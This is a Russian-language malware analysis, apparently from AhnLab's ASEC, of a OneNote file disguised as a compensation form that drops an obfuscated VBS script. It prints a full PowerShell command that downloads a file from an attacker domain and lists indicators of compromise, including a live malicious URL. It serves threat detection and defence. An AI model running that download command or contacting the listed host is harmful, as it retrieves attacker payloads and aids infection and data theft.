Центр экстренного реагирования AhnLab Security Emergency response Center (ASEC) обнаружил распространение вредоносной программы OneNote, замаскированной под форму, связанную с компенсацией. Подтвержденный файл выдает себя за тот же исследовательский центр, что и вредоносная программа типа LNK, о которой говорится в сообщении ниже. Основываясь на идентичной вредоносной активности, выполняемой файлами VBS, команда пришла к выводу, что за обоими инцидентами стоит один и тот же угрожающий субъект.
При открытии файла OneNote появляется страница с обсуждением компенсации, которая предлагает пользователям нажать на то, что, по-видимому, является областью, где прикреплен файл HWP.
Если пользователь щелкает по этому сценарию, создается вредоносный VBS-файл и выполняется под именем personal.vbs во временном каталоге. Код созданного VBS-файла делает следующую, обфусцированную команду похожей на аннотацию, после прочтения которой происходит расшифровка и выполнение вредоносной команды.
Расшифрованный код скрипта в конечном итоге обращается к hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 для выполнения дополнительного кода скрипта. В настоящее время этот URL недоступен, но его формат показывает, что, скорее всего, он выполнял скрипт для кражи информации, подобный тому, что приведен в сообщении ниже.
После этого он загружает и открывает файл HWP из hxxp://delps.scienceontheweb.net/ital/info/sample.hwp с помощью команды PowerShell.
Выполняемая команда PowerShell
1 | powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace('shell:Downloads').Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\personal.hwp;start-sleep -seconds 1 |
Хотя HWP-файл не мог быть загружен во время анализа, предполагается, что для обмана пользователей был использован обычный HWP-файл.
Indicators of Compromise
URLs
- http://delps.scienceontheweb.net/ital/info/list.php?query=1
MD5
- aa756b20170aa0869d6f5d5b5f1b7c37
- f2a0e92b80928830704a00c91df87644